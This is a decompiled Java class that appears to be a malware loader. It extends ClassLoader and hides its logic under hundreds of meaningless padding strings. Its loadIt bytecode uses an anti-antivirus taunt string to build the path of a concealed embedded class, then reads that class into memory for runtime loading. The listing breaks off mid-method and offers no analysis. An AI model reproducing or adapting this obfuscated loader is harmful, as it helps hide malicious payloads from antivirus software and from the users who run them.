import java.io.ObjectInputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// 
// Decompiled by Procyon v0.5.30
// 

public class d3bbd09724b6936399 extends ClassLoader implements Serializable
{
    String GtvW8yw;
    String KpnN9ok;
    String RtrA8ac;
    String LagP8zs;
    String DrcR5rj;
    String DnsQ7yz;
    String LtlS1hp;
    String HftM6gp;
    String BlbM3gr;
    String QweZ8tw;
    String VgqP1cy;
    String TuuJ7xz;
    String GqeT1kw;
    String TbfB3xb;
    String NwjS2ow;
    String GcoZ7sf;
    String KfnQ6xs;
    String BevX8lz;
    String DqeU5jp;
    String HpaQ9ne;
    String OsiT9kp;
    String VjcL4fe;
    String LeyH3vt;
    String NgpX6xp;
    String GbsK4us;
    String KebG4wc;
    String OozE4ze;
    String LwdE3wv;
    String TqmA9ri;
    String PnrF7pp;
    String VixJ4bm;
    String EeaT9ps;
    String ObfZ3wx;
    String SgnW2ul;
    String EseW9sv;
    String BexQ3zx;
    String SmmL3rg;
    String WenE4rs;
    String JkzG8ou;
    String IahR4sl;
    String ClaP3dm;
    String VksE4bn;
    String QdcH7yt;
    String WmlL7yj;
    String QtdB9jd;
    String NfbZ1uc;
    String GecV3px;
    String WwuB3se;
    String VdnL2rj;
    String HfaN5gm;
    String NjrQ7dz;
    String AlpG7lj;
    String TdkI1pv;
    String MerR5ca;
    String FrhZ8tt;
    String YpkW7iy;
    String ZowT4wt;
    String XamZ9uw;
    String SonT1bz;
    String WuiD8eo;
    String PaiA5mu;
    String BomL6cf;
    String ZlzA5mz;
    String LbuV3yh;
    String LioN6kh;
    String OpvY9yd;
    String GgyG7ww;
    String PmwS7tx;
    String MfdU6mz;
    String JsoS2qq;
    String FbvM7pa;
    String UolO9dg;
    String BqnL5bi;
    String NqzP4oz;
    String GixR6bx;
    String ZcfG8da;
    String YsyL5xn;
    String GrzX3ik;
    String SrdG9mv;
    String HwaE3bo;
    String ZgxF7yx;
    String XamP6xa;
    String JuvN9ys;
    String DtwS8yo;
    String RlaN4nq;
    String KdwT1th;
    String FboK5zt;
    String AlkL6pw;
    String HyoA2qs;
    String ObbH6xc;
    String EdsB3xp;
    String KxoC2kc;
    String GulI3pk;
    String EppT5hw;
    String WhoI9gr;
    String YprA1cx;
    String JfdF7ui;
    String EevB8wj;
    String JtaZ4tt;
    String FptU6tp;
    private static final long serialVersionUID = -7072212342699783162L;
    public static d3bbd09724b6936399 instance;
    String FhrN6lh;
    String VwmM5lm;
    String XolX4kz;
    String NwcN2kk;
    String IvmS9xg;
    String QrqN4ax;
    String MaaN7wv;
    String TguM4tm;
    String XlmF4vh;
    String IfzL3ce;
    String HltR7te;
    String FfdG1uc;
    String XzbD6wp;
    String QveY2vo;
    String OuiO3ge;
    String BtaX6ht;
    String IegN3zw;
    String PnbW9qk;
    String WjeZ1ez;
    String OsgS1hk;
    String SuhB5tn;
    String PvsE4bi;
    String UmiN7ia;
    String MvkE7nj;
    String XifW8hl;
    String KwyI3sk;
    String XfwF3pn;
    String WkvZ9wv;
    String IutE4tj;
    String ZhnG5pl;
    String YahR1pj;
    String ZjyT4hm;
    String RimA4rw;
    String TndX5ht;
    String IpnC3za;
    String BfyZ7fn;
    String MjuU1cr;
    String UqnM8wo;
    String QfoY3hn;
    String OocS3uz;
    String GkcA3rl;
    String UlgY3sg;
    String LdjY6qw;
    String HqaF4hy;
    String CoyM9ya;
    String TxaZ9nk;
    String IbcN5ym;
    String OwbH8yu;
    String YbpH1oh;
    String IuaJ4mm;
    String YzcY4tb;
    String LmxF2pt;
    String HqdW3av;
    String VghU1rj;
    String ZobR3yn;
    String KscF5mm;
    String KdkB7zn;
    String FkuR4mo;
    String JtjR1dh;
    String VnyC9vq;
    String IhgK5lt;
    String StpS4fh;
    String PojM1uv;
    String SvjH6mx;
    String DmcB4sb;
    String RxnZ5py;
    String TjdG7sl;
    String TbpH2bs;
    String YraK1yp;
    String MkyH1ig;
    String UrvH3jx;
    String CszD3sl;
    String MmtE1ub;
    String WgpI1mp;
    String DlbV9py;
    String KupL6po;
    String IerB6ah;
    
    static {
        d3bbd09724b6936399.instance = null;
    }
    
    public d3bbd09724b6936399() {
        this.GtvW8yw = "duczfbfllw";
        this.KpnN9ok = "wmnldrqmom";
        this.RtrA8ac = "potkcfxvsg";
        this.LagP8zs = "ygbiiexmlw";
        this.DrcR5rj = "gvmessiruk";
        this.DnsQ7yz = "hkjamkdhre";
        this.LtlS1hp = "sfpajfmrzy";
        this.HftM6gp = "ywymxfcnjo";
        this.BlbM3gr = "hkxjzucyuc";
        this.QweZ8tw = "rftqrmlagm";
        this.VgqP1cy = "fiaaspbwjm";
        this.TuuJ7xz = "gychybvdqs";
        this.GqeT1kw = "bzfqemcabr";
        this.TbfB3xb = "bgvyydbeiu";
        this.NwjS2ow = "rflgdotybt";
        this.GcoZ7sf = "tbkoniqfdd";
        this.KfnQ6xs = "npbasemhbb";
        this.BevX8lz = "gobbhypeqm";
        this.DqeU5jp = "rgoyyerksa";
        this.HpaQ9ne = "nhwtllroar";
        this.OsiT9kp = "ipkihstjwp";
        this.VjcL4fe = "diycmnfbyf";
        this.LeyH3vt = "uhlgfeorly";
        this.NgpX6xp = "lyhgzvyzhl";
        this.GbsK4us = "xbldmtknah";
        this.KebG4wc = "ojgxouhodz";
        this.OozE4ze = "vkrwdsbftu";
        this.LwdE3wv = "leuxknylzd";
        this.TqmA9ri = "rebkixkfvf";
        this.PnrF7pp = "qnlrckcecm";
        this.VixJ4bm = "ekaaceauma";
        this.EeaT9ps = "xayaltcnud";
        this.ObfZ3wx = "etiepuxihn";
        this.SgnW2ul = "yitfmtoppg";
        this.EseW9sv = "rojadhpjog";
        this.BexQ3zx = "rlznbmljdu";
        this.SmmL3rg = "xiiisjppcb";
        this.WenE4rs = "fjrwspowir";
        this.JkzG8ou = "jniutrbvas";
        this.IahR4sl = "xjdtxiljqx";
        this.ClaP3dm = "mkorkfoxze";
        this.VksE4bn = "yzguydkbfu";
        this.QdcH7yt = "wvrjwidjfy";
        this.WmlL7yj = "csxcsbigwo";
        this.QtdB9jd = "lxmoewhofz";
        this.NfbZ1uc = "vpixfoyjcr";
        this.GecV3px = "qinlulrtwi";
        this.WwuB3se = "kyxevfuvlg";
        this.VdnL2rj = "bouffgvbmj";
        this.HfaN5gm = "unbxrcbtiw";
        this.NjrQ7dz = "neybbpkgrj";
        this.AlpG7lj = "xepobeiorj";
        this.TdkI1pv = "tdaakyclbx";
        this.MerR5ca = "qdfswfejnz";
        this.FrhZ8tt = "ixbohmxdcp";
        this.YpkW7iy = "sbebpsvkup";
        this.ZowT4wt = "pfzbznghwk";
        this.XamZ9uw = "dbxvhpunpm";
        this.SonT1bz = "jfizelywrf";
        this.WuiD8eo = "xyorhgxjqj";
        this.PaiA5mu = "qvimeycyif";
        this.BomL6cf = "uczrycqedz";
        this.ZlzA5mz = "twrbezbepi";
        this.LbuV3yh = "ckvbqicxtw";
        this.LioN6kh = "uyyafdkulz";
        this.OpvY9yd = "shzbcxzywt";
        this.GgyG7ww = "ycgxsstmsw";
        this.PmwS7tx = "jdlxusdqsv";
        this.MfdU6mz = "cyiwmlvdam";
        this.JsoS2qq = "mirmrracja";
        this.FbvM7pa = "cjsqcfjrrc";
        this.UolO9dg = "qgtmgjrnqe";
        this.BqnL5bi = "xbhazlyrdk";
        this.NqzP4oz = "earkkoxdes";
        this.GixR6bx = "thuenixslr";
        this.ZcfG8da = "csyszvwobo";
        this.YsyL5xn = "ybklankahk";
        this.GrzX3ik = "vuiasjhoxa";
        this.SrdG9mv = "efvrinkwiq";
        this.HwaE3bo = "qxvdiyphkt";
        this.ZgxF7yx = "omwuwetukt";
        this.XamP6xa = "bnwnjznoei";
        this.JuvN9ys = "spsxcgpssd";
        this.DtwS8yo = "eqedlqjrno";
        this.RlaN4nq = "gaejnforin";
        this.KdwT1th = "jioeifqunt";
        this.FboK5zt = "hbjhwpmfbf";
        this.AlkL6pw = "jpzwnpslws";
        this.HyoA2qs = "mzczopypfa";
        this.ObbH6xc = "mtqfqlymdy";
        this.EdsB3xp = "uxqpcrddcx";
        this.KxoC2kc = "cpbvoasokm";
        this.GulI3pk = "koemzhonef";
        this.EppT5hw = "klwxgniytg";
        this.WhoI9gr = "odlyyqouxx";
        this.YprA1cx = "pdmfsofzew";
        this.JfdF7ui = "svedqqwhtb";
        this.EevB8wj = "fmmtxjelce";
        this.JtaZ4tt = "kqdsqvffke";
        this.FptU6tp = "cuodpwvmzq";
        this.FhrN6lh = "plbrhloivv";
        this.VwmM5lm = "bwyczwnuec";
        this.XolX4kz = "pavmcofuxv";
        this.NwcN2kk = "zpcilkjsdv";
        this.IvmS9xg = "vvodvryixl";
        this.QrqN4ax = "xvdmbqgpee";
        this.MaaN7wv = "lqvzqtvipd";
        this.TguM4tm = "yfnuargcya";
        this.XlmF4vh = "xvcaeuawgs";
        this.IfzL3ce = "hvxyzsjaem";
        this.HltR7te = "bywcojnavt";
        this.FfdG1uc = "pdvvxavddz";
        this.XzbD6wp = "gikhwtehoz";
        this.QveY2vo = "okehgdwvpa";
        this.OuiO3ge = "qrchhjnnmn";
        this.BtaX6ht = "bjulttwwes";
        this.IegN3zw = "zfwdjqamld";
        this.PnbW9qk = "blapxcctfq";
        this.WjeZ1ez = "rtozotysgt";
        this.OsgS1hk = "xkgqufsgje";
        this.SuhB5tn = "xerxezgavz";
        this.PvsE4bi = "exlbpowfdp";
        this.UmiN7ia = "ltkmiyadsl";
        this.MvkE7nj = "vqenjsgpiw";
        this.XifW8hl = "efixrjtehw";
        this.KwyI3sk = "vujczxaswd";
        this.XfwF3pn = "fgxgghcsoa";
        this.WkvZ9wv = "uwakkkimui";
        this.IutE4tj = "hsixkdexew";
        this.ZhnG5pl = "axsklxqpex";
        this.YahR1pj = "nrzmvcvbex";
        this.ZjyT4hm = "zqpcjiapdj";
        this.RimA4rw = "fdqbqskdli";
        this.TndX5ht = "whijwnxfxy";
        this.IpnC3za = "gtzpcklgcc";
        this.BfyZ7fn = "zpzlkntszn";
        this.MjuU1cr = "jutverculg";
        this.UqnM8wo = "vpcdpdhola";
        this.QfoY3hn = "qtwtalxhfg";
        this.OocS3uz = "hohivzxvte";
        this.GkcA3rl = "cyuvueicys";
        this.UlgY3sg = "zmrztfdnag";
        this.LdjY6qw = "lwnclgeoui";
        this.HqaF4hy = "msrsfiztuc";
        this.CoyM9ya = "ltwyojvdoj";
        this.TxaZ9nk = "srjumvrfhm";
        this.IbcN5ym = "aydsddxcab";
        this.OwbH8yu = "uvulioqgze";
        this.YbpH1oh = "phzsqutgfw";
        this.IuaJ4mm = "xpzdbkehpn";
        this.YzcY4tb = "pfisuoesmp";
        this.LmxF2pt = "weanvhxoye";
        this.HqdW3av = "qgzrxskhtd";
        this.VghU1rj = "fjwgvyvkij";
        this.ZobR3yn = "lewnvyzdnf";
        this.KscF5mm = "qhynigduzy";
        this.KdkB7zn = "pwfdytomyt";
        this.FkuR4mo = "gdpqhopjpy";
        this.JtjR1dh = "rakwmtrpfp";
        this.VnyC9vq = "uopgzjrkpb";
        this.IhgK5lt = "noekhlexnq";
        this.StpS4fh = "wenljokmci";
        this.PojM1uv = "lcdsvxwzrw";
        this.SvjH6mx = "uysimlscbg";
        this.DmcB4sb = "ewfskpbsoe";
        this.RxnZ5py = "onmnkvhsdg";
        this.TjdG7sl = "sqtqlzhepj";
        this.TbpH2bs = "krqtnfsyyf";
        this.YraK1yp = "tkqzalpqrn";
        this.MkyH1ig = "icsktcprsg";
        this.UrvH3jx = "hnfldhxknk";
        this.CszD3sl = "afzkcmabce";
        this.MmtE1ub = "uvmdriakop";
        this.WgpI1mp = "zquovaowow";
        this.DlbV9py = "drlkmdcwey";
        this.KupL6po = "dwqjdzovlm";
        this.IerB6ah = "yeechxqnvw";
    }
    
    private void writeObject(final ObjectOutputStream paramObjectOutputStream) throws IOException, ClassNotFoundException {
        paramObjectOutputStream.defaultWriteObject();
    }
    
    private void readObject(final ObjectInputStream paramObjectInputStream) throws IOException, ClassNotFoundException {
        d3bbd09724b6936399.instance = this;
        paramObjectInputStream.defaultReadObject();
    }
    
    public void loadIt() throws IOException, InstantiationException, IllegalAccessException {
        // 
        // This method could not be decompiled.
        // 
        // Original Bytecode:
        // 
        //     0: ldc_w           "brzrhmadxi"
        //     3: astore_1        /* KfwT4az */
        //     4: ldc_w           "dgqpwvgfvm"
        //     7: astore_2        /* HkfB6mh */
        //     8: ldc_w           "merdshyemg"
        //    11: astore_3        /* LvuP7wz */
        //    12: ldc_w           "qbwhnmhmbt"
        //    15: astore          AltA8md
        //    17: ldc_w           "rejhejuzwg"
        //    20: astore          FosW2wb
        //    22: ldc_w           "uqmanrgrum"
        //    25: astore          OlwB3cr
        //    27: ldc_w           "wduasbaufy"
        //    30: astore          BsqS8gs
        //    32: ldc_w           "wvgsrzvddc"
        //    35: astore          HddI1tv
        //    37: ldc_w           "lxgurkxude"
        //    40: astore          MpyW9wr
        //    42: ldc_w           "nwlngijxna"
        //    45: astore          HwcI9ad
        //    47: ldc_w           "mmammtsptv"
        //    50: astore          VcgC7su
        //    52: ldc_w           "xschkjxrqz"
        //    55: astore          YqyJ5de
        //    57: ldc_w           "upwecwfbaa"
        //    60: astore          YsjX7ca
        //    62: ldc_w           "blkudyhacz"
        //    65: astore          LegQ1nr
        //    67: ldc_w           "sjwekcsjqy"
        //    70: astore          RgkE8hw
        //    72: ldc_w           "ywmpgqqqzj"
        //    75: astore          KxhC7bj
        //    77: ldc_w           "nlkgcyxlih"
        //    80: astore          FbuC3jy
        //    82: ldc_w           "hdqjrruaet"
        //    85: astore          ZqlC3wu
        //    87: ldc_w           "tpnnpaqrbs"
        //    90: astore          NnlF5en
        //    92: ldc_w           "hzlolwrefb"
        //    95: astore          LdvF7rk
        //    97: ldc_w           "nrgjemvttd"
        //   100: astore          KnyE1kg
        //   102: ldc_w           "itamhtbspn"
        //   105: astore          CehO1ns
        //   107: ldc_w           "avfriorkqy"
        //   110: astore          ThoP3kk
        //   112: ldc_w           "hchlaxfqko"
        //   115: astore          DizP5fv
        //   117: ldc_w           "qvhmvjgdbk"
        //   120: astore          ZzbZ8ip
        //   122: ldc_w           "wxcajwypcu"
        //   125: astore          ZnfR6aw
        //   127: ldc_w           "hrhjesvwur"
        //   130: astore          UxsX8pj
        //   132: ldc_w           "frifrqzfmi"
        //   135: astore          LhxT8di
        //   137: ldc_w           "vfiriwjpdn"
        //   140: astore          OqxG2ym
        //   142: ldc_w           "twunapgbab"
        //   145: astore          YzkL7vz
        //   147: ldc_w           "uzxqivoqea"
        //   150: astore          XuzP9gg
        //   152: ldc_w           "virzquovmm"
        //   155: astore          XpcA9az
        //   157: ldc_w           "pcypkiazxg"
        //   160: astore          FtyC7dv
        //   162: ldc_w           "gtloqnsinf"
        //   165: astore          MsmF7jx
        //   167: ldc_w           "hywnlcbmcs"
        //   170: astore          JceZ5ck
        //   172: ldc_w           "oknvxxeaxw"
        //   175: astore          KpqG4mn
        //   177: ldc_w           "qvsgxtxgxx"
        //   180: astore          NjzC8ei
        //   182: ldc_w           "uxttcncjyg"
        //   185: astore          IghF4bo
        //   187: ldc_w           "lsbttfyoqm"
        //   190: astore          WvkO2jj
        //   192: ldc_w           "hzchzwifsm"
        //   195: astore          WdpU8ta
        //   197: ldc_w           "octiythsuz"
        //   200: astore          BgvZ7oh
        //   202: ldc_w           "tjwmxoxafx"
        //   205: astore          RgmU9gb
        //   207: ldc_w           "anpqhbmjoj"
        //   210: astore          LkzP7aj
        //   212: ldc_w           "grgiknjbav"
        //   215: astore          XbzX7jl
        //   217: ldc_w           "wjjegclqyg"
        //   220: astore          RmjJ2tj
        //   222: ldc_w           "luzvwbjafi"
        //   225: astore          AulH4gc
        //   227: ldc_w           "ftdewrovtx"
        //   230: astore          LvzW5mb
        //   232: ldc_w           "hhabbqkqco"
        //   235: astore          BmwM6nn
        //   237: ldc_w           "yuqmknwgxc"
        //   240: astore          WyqI5jr
        //   242: ldc_w           "kznybcnwgz"
        //   245: astore          CuvJ7rj
        //   247: ldc_w           "pbfpeaigkp"
        //   250: astore          QatA4lt
        //   252: ldc_w           "mevhwxvzqq"
        //   255: astore          YcyI5zl
        //   257: ldc_w           "qfcgouulgs"
        //   260: astore          NtdA9ci
        //   262: ldc_w           "pdgrktabpv"
        //   265: astore          PfxU7yf
        //   267: ldc_w           "nwmwqqdtgn"
        //   270: astore          JgoW3np
        //   272: ldc_w           "galltavwig"
        //   275: astore          WgxF4rk
        //   277: ldc_w           "cpexbhuooi"
        //   280: astore          SqnI7bq
        //   282: ldc_w           "mkyevjyiqb"
        //   285: astore          IpsV2qe
        //   287: ldc_w           "vslcdauxmz"
        //   290: astore          EzxI2lf
        //   292: ldc_w           "phzukhspmi"
        //   295: astore          RtyU2vh
        //   297: ldc_w           "hkjrnmsgxe"
        //   300: astore          ZazE6sg
        //   302: ldc_w           "efxqqonztd"
        //   305: astore          LlwS4hr
        //   307: ldc_w           "zygkbuxhpu"
        //   310: astore          EgkI1jy
        //   312: ldc_w           "ucflwjesfe"
        //   315: astore          NziE1wx
        //   317: ldc_w           "kgdkephndf"
        //   320: astore          PasB6db
        //   322: ldc_w           "bwkubifqrh"
        //   325: astore          IjtK2xo
        //   327: ldc_w           "sarnftjqxe"
        //   330: astore          SopD3hs
        //   332: ldc_w           "tespergsbl"
        //   335: astore          DauK7vg
        //   337: ldc_w           "zjuvlkbccn"
        //   340: astore          RnyL8qd
        //   342: ldc_w           "bsueouqxho"
        //   345: astore          TmdX4ry
        //   347: ldc_w           "dizxvieoss"
        //   350: astore          BagP4wf
        //   352: ldc_w           "cjhztrshzf"
        //   355: astore          PzpV1mc
        //   357: ldc_w           "cytxrqppff"
        //   360: astore          AnfH1du
        //   362: ldc_w           "abkjdvzevl"
        //   365: astore          FxqU5lj
        //   367: ldc_w           "hpjbjcrryi"
        //   370: astore          AukJ7au
        //   372: ldc_w           "eevwyqvvmx"
        //   375: astore          VhsJ5xb
        //   377: ldc_w           "vuyexbwexb"
        //   380: astore          TitY6ks
        //   382: ldc_w           "gylzymxvky"
        //   385: astore          YpiI9hh
        //   387: ldc_w           "fxbkbsbyvh"
        //   390: astore          DjiI5et
        //   392: ldc_w           "fxkbbpxvsg"
        //   395: astore          WloY6pl
        //   397: ldc_w           "faedvixgxn"
        //   400: astore          TkxM9at
        //   402: ldc_w           "xlthccdcdx"
        //   405: astore          ResV4ti
        //   407: ldc_w           "tjcpcwnavs"
        //   410: astore          SoyV7va
        //   412: ldc_w           "vxsxjmqmdu"
        //   415: astore          BkdM3dl
        //   417: ldc_w           "vvdlohkaby"
        //   420: astore          DefR6zj
        //   422: ldc_w           "gpipahahof"
        //   425: astore          UjtM8vv
        //   427: ldc_w           "eihhabtgxf"
        //   430: astore          AtaD5pt
        //   432: ldc_w           "eaodabacuy"
        //   435: astore          FkdA2jf
        //   437: ldc_w           "yzmxgsomzr"
        //   440: astore          BulL5wj
        //   442: ldc_w           "mxquxsovpq"
        //   445: astore          VveI2we
        //   447: new             Ljava/io/ByteArrayOutputStream;
        //   450: dup            
        //   451: invokespecial   java/io/ByteArrayOutputStream.<init>:()V
        //   454: astore          FUCKYALLHOES1
        //   456: sipush          8192
        //   459: newarray        B
        //   461: astore          FUCKYALLHOES2
        //   463: ldc_w           "kxafzlxvra"
        //   466: astore          IavD5jh
        //   468: ldc_w           "amapitdcnf"
        //   471: astore          TvoC5uv
        //   473: ldc_w           "yxsyufkdqr"
        //   476: astore          MehW1xb
        //   478: ldc_w           "miuoiyqtoi"
        //   481: astore          NokJ9xz
        //   483: ldc_w           "uwylfbfayv"
        //   486: astore          GdxV7oj
        //   488: ldc_w           "yieekxxvhf"
        //   491: astore          XxeM3or
        //   493: ldc_w           "hplmxkcsjx"
        //   496: astore          BpsR5en
        //   498: ldc_w           "tcqqimshwp"
        //   501: astore          UzhO8yv
        //   503: ldc_w           "awllxmhyqw"
        //   506: astore          JhoG3nm
        //   508: ldc_w           "jnlaaejbdf"
        //   511: astore          MgyR6ys
        //   513: ldc_w           "wjpmfwrbea"
        //   516: astore          ZzrD9ty
        //   518: ldc_w           "dpkfmmugcn"
        //   521: astore          RmlI7kx
        //   523: ldc_w           "kulvcculdn"
        //   526: astore          QuzA1cz
        //   528: ldc_w           "jsvqseawbh"
        //   531: astore          MjvQ9xh
        //   533: ldc_w           "swpknkkupl"
        //   536: astore          LoaZ1rs
        //   538: ldc_w           "erzvlfifxk"
        //   541: astore          JniQ1ry
        //   543: ldc_w           "vgigrrabmn"
        //   546: astore          BtpW8fu
        //   548: ldc_w           "teqijilyyw"
        //   551: astore          VlhV3kv
        //   553: ldc_w           "ixptopihoj"
        //   556: astore          NwnF1dx
        //   558: ldc_w           "pyabgdhdbp"
        //   561: astore          EbpF3er
        //   563: ldc_w           "ezoptkzzii"
        //   566: astore          DkeL4xx
        //   568: ldc_w           "pphsesxhmx"
        //   571: astore          AqrA5rg
        //   573: ldc_w           "pjhltkxiuc"
        //   576: astore          KcuR4jz
        //   578: ldc_w           "uddaksdbfm"
        //   581: astore          KqfQ7hx
        //   583: ldc_w           "mpvfvbjlpw"
        //   586: astore          IugV4qq
        //   588: ldc_w           "uvgsuibrbp"
        //   591: astore          VtqI5di
        //   593: ldc_w           "ryaqwcdwkg"
        //   596: astore          CbeC6lu
        //   598: ldc_w           "kblwtwkbkv"
        //   601: astore          AcrC1by
        //   603: ldc_w           "awqguzwivc"
        //   606: astore          MlaR7yt
        //   608: ldc_w           "wjslmsxzoo"
        //   611: astore          MkgT5xi
        //   613: ldc_w           "yltjjvtbjv"
        //   616: astore          PlnA1kf
        //   618: ldc_w           "kfahaebkud"
        //   621: astore          SlkA1ny
        //   623: ldc_w           "fhwicycgdz"
        //   626: astore          QuoW9qn
        //   628: ldc_w           "hygukrchzm"
        //   631: astore          UsjB9tp
        //   633: ldc_w           "leofqfxujs"
        //   636: astore          AxiB3qk
        //   638: ldc_w           "dxjglknuto"
        //   641: astore          DhpE1vq
        //   643: ldc_w           "rzcmgypkpc"
        //   646: astore          ZjtG1py
        //   648: ldc_w           "ircsmtavst"
        //   651: astore          VyqN2xb
        //   653: ldc_w           "pbtukmnwzy"
        //   656: astore          AycZ3sf
        //   658: ldc_w           "usfashyuyl"
        //   661: astore          RemP2ez
        //   663: ldc_w           "pjfbiqulnc"
        //   666: astore          EgtR2qm
        //   668: ldc_w           "ftchkratbk"
        //   671: astore          FqkJ3ks
        //   673: ldc_w           "pkgqstcrvo"
        //   676: astore          NtaY6ux
        //   678: ldc_w           "fcdgzuxcdq"
        //   681: astore          CwbG9wb
        //   683: ldc_w           "kyktslwwek"
        //   686: astore          JajJ2ye
        //   688: ldc_w           "drheghbniu"
        //   691: astore          HjjV2oz
        //   693: ldc_w           "ewndvnieky"
        //   696: astore          SqrF4pp
        //   698: ldc_w           "chpfyexfcn"
        //   701: astore          HzlF5om
        //   703: ldc_w           "dgqzabljxx"
        //   706: astore          NmbL6yk
        //   708: ldc_w           "wpohxyqpae"
        //   711: astore          ImsI2ug
        //   713: ldc_w           "fprxxkzwfj"
        //   716: astore          YovP9ar
        //   718: ldc_w           "gmdfdsepyy"
        //   721: astore          TiiY1co
        //   723: ldc_w           "cfgwxnijwq"
        //   726: astore          HxeG7vl
        //   728: aload_0         /* this */
        //   729: invokespecial   java/lang/Object.getClass:()Ljava/lang/Class;
        //   732: ldc_w           "FUCKYOUAVASTANDOTHERSHIT/FUCKYOUAVASTANDOTHERSHITcFUCKYOUAVASTANDOTHERSHITjFUCKYOUAVASTANDOTHERSHITkFUCKYOUAVASTANDOTHERSHITyFUCKYOUAVASTANDOTHERSHITxFUCKYOUAVASTANDOTHERSHITlFUCKYOUAVASTANDOTHERSHITbFUCKYOUAVASTANDOTHERSHITrFUCKYOUAVASTANDOTHERSHITfFUCKYOUAVASTANDOTHERSHITrFUCKYOUAVASTANDOTHERSHITwFUCKYOUAVASTANDOTHERSHITaFUCKYOUAVASTANDOTHERSHITxFUCKYOUAVASTANDOTHERSHITbFUCKYOUAVASTANDOTHERSHITyFUCKYOUAVASTANDOTHERSHITcFUCKYOUAVASTANDOTHERSHIT.FUCKYOUAVASTANDOTHERSHITcFUCKYOUAVASTANDOTHERSHITlFUCKYOUAVASTANDOTHERSHITaFUCKYOUAVASTANDOTHERSHITsFUCKYOUAVASTANDOTHERSHITsFUCKYOUAVASTANDOTHERSHIT"
        //   735: ldc_w           "FUCKYOUAVASTANDOTHERSHIT"
        //   738: ldc_w           ""
        //   741: invokevirtual   java/lang/String.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
        //   744: invokevirtual   java/lang/Class.getResourceAsStream:(Ljava/lang/String;)Ljava/io/InputStream;
        //   747: astore          FUCKYALLHOES3
        //   749: ldc_w           "mmqnsgevcx"
        //   752: astore          OmwC3qa
        //   754: ldc_w           "tafekzzsle"
        //   757: astore          ZprZ3dx
        //   759: ldc_w           "lxwocwhqby"
        //   762: astore          WwsK9la
        //   764: ldc_w           "ahdeflgwfv"
        //   767: astore          PasD9uw
        //   769: ldc_w           "bxovzvztij"
        //   772: astore          NbyJ4by
        //   774: ldc_w           "olisrtkylc"
        //   777: astore          EasM2ni
        //   779: ldc_w           "gzuvszhsll"
        //   782: astore          OzyC1pr
        //   784: ldc_w           "pcwarbargy"
        //   787: astore          FfsG3bz
        //   789: ldc_w           "abithoyipq"
        //   792: astore          EtwC1sn
        //   794: ldc_w           "bpxpejckby"
        //   797: astore          VkwK3dz
        //   799: ldc_w           "pygevqoicv"
        //   802: astore          TlfL8uk
        //   804: ldc_w           "pxqykzntzh"
        //   807: astore          QxnQ3xr
        //   809: ldc_w           "pzllnildvq"
        //   812: astore          IouY5ru
        //   814: ldc_w           "jzhihycbwt"
        //   817: astore          WeyR3ri
        //   819: ldc_w           "hfnqutosls"
        //   822: astore          BniK6wb
        //   824: ldc_w           "udjlcpiqlc"
        //   827: astore          LjeY6iv
        //   829: ldc_w           "yycbgtqoug"
        //   832: astore          HppC3vb
        //   834: ldc_w           "zfitlfmxtv"
        //   837: astore          RcqX5xh
        //   839: ldc_w           "ozqojajvzq"
        //   842: astore          JwdY4sx
        //   844: ldc_w           "boznbyzhfx"
        //   847: astore          NlrY2ns
        //   849: ldc_w           "thzghqmcob"
        //   852: astore          AvsK4wf
        //   854: ldc_w           "cwzeimvjak"
        //   857: astore          LegO3yf
        //   859: ldc_w           "bhtxnledjc"
        //   862: astore          SzdL1eh
        //   864: ldc_w           "reiyhihtek"
        //   867: astore          CtbQ6zq
        //   869: ldc_w           "ejrpuieqnm"
        //   872: astore          EdkO7he
        //   874: ldc_w           "gprdsunlub"
        //   877: astore          TctZ8nn
        //   879: ldc_w           "hijqzydsne"
        //   882: astore          WweP5vi
        //   884: ldc_w           "qhggmlgyxt"
        //   887: astore          CbhQ3bv
        //   889: ldc_w           "ylqwqjvibx"
        //   892: astore          ExeK5an
        //   894: ldc_w           "nlfjnkcvnc"
        //   897: astore          WvhY4rr
        //   899: ldc_w           "izoeiniqyo"
        //   902: astore          ZnfG4sy
        //   904: ldc_w           "zvbqmledak"
        //   907: astore          KhvD1sx
        //   909: ldc_w           "ffbcpbezqa"
        //   912: astore          PxeM2pm
        //   914: ldc_w           "yzmbhxclcx"
        //   917: astore          EieB5xx
        //   919: ldc_w           "arkeksvauj"
        //   922: astore          PhiP7am
        //   924: ldc_w           "mdfaynqahc"
        //   927: astore          MoyS7de
        //   929: ldc_w           "nlllfwlrui"
        //   932: astore          EtvF1oo
        //   934: goto            1187
        //   937: ldc_w           "cfspiwppka"
        //   940: astore          AgkT3wi
        //   942: ldc_w           "mbsbrsnflr"
        //   945: astore          FauM4pa
        //   947: ldc_w           "queaspfgyg"
        //   950: astore          EzpW9vf
        //   952: ldc_w           "ubjxlczanv"
        //   955: astore          EgoK5mp
        //   957: ldc_w           "ycanwgemmt"
        //   960: astore          KisH2fn
        //   962: ldc_w           "cvjjqlodcn"
        //   965: astore          QgiL1ii
        //   967: ldc_w           "ekjtjnyqzd"
        //   970: astore          BneQ2cj
        //   972: ldc_w           "lorakfjmrn"
        //   975: astore          YdmX8lr
        //   977: ldc_w           "vxzzalterc"
        //   980: astore          AfnB4lf
        //   982: ldc_w           "hyaozxbejg"
        //   985: astore          CjzL3cj
        //   987: ldc_w           "qlfnivljoa"
        //   990: astore          KvrW2um
        //   992: ldc_w           "mxjthauqgn"
        //   995: astore          ZgnS6ek
        //   997: ldc_w           "pezmbeikgn"
        //  1000: astore          YtgQ6zi
        //  1002: ldc_w           "lpevinrjow"
        //  1005: astore          KwtC9ys
        //  1007: ldc_w           "zmuekdglon"
        //  1010: astore          OsxR7ot
        //  1012: ldc_w           "erpchqvjst"
        //  1015: astore          FyzS7ln
        //  1017: ldc_w           "hooynvvvmn"
        //  1020: astore          CpvG9xj
        //  1022: ldc_w           "yskiphlbun"
        //  1025: astore          IasE5zi
        //  1027: ldc_w           "hjneowgxcm"
        //  1030: astore          FdaJ3kb
        //  1032: ldc_w           "cmtmczzhhy"
        //  1035: astore          VtaY9ng
        //  1037: ldc_w           "smmfszmtnn"
        //  1040: astore          KflS9fb
        //  1042: ldc_w           "eotyxhhnet"
        //  1045: astore          GapH2cv
        //  1047: ldc_w           "yxcevckuek"
        //  1050: astore          YorZ3co
        //  1052: ldc_w           "lugjfrkzsb"
        //  1055: astore          TxvX3yu
        //  1057: ldc_w           "wjkvkkupgp"
        //  1060: astore          HtaV6qm
        //  1062: ldc_w           "cqrvhaqpjk"
        //  1065: astore          PjaK5he
        //  1067: ldc_w           "pbtywpavcn"
        //  1070: astore          PcwV4kb
